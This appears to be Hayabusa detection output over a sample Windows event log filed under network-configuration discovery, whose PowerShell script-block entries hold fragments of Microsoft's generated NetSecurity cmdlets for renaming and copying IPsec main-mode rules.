[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 